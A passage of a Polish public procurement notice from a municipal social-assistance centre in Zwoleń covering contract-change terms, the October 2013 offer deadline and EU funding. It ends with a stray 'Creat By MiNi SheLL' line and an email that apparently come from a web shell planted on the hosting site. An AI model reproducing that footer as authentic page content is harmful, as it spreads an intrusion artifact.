7)Zmiana stawki podatku VAT nie może spowodować zmiany wynagrodzenia brutto Wykonawcy, 
8)Zmiana miejsca szkolenia, w przypadku gdy Wykonawca zaproponuje lepsze warunki lokalowe, w przypadku awarii Sali szkoleniowej lub budynku, uniemożliwiającej przeprowadzenie zajęć lub kiedy umowa między wykonawcą lub właścicielem Sali przeznaczonej na szkolenie zostanie rozwiązana z przyczyn nie leżących po stronie wykonawcy.
9)Zmiany harmonogramu przeprowadzonych zajęć, w przypadku kiedy wykładowca przewidziany do realizacji ze względów zdrowotnych, rodzinnych lub zawodowych nie może przeprowadzić zajęć w danym terminie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwolen.naszops.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Zwoleniu, ul. Lubelska 6, 26-700 Zwoleń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 11:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Zwoleniu, ul. Lubelska 6, 26-700 Zwoleń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com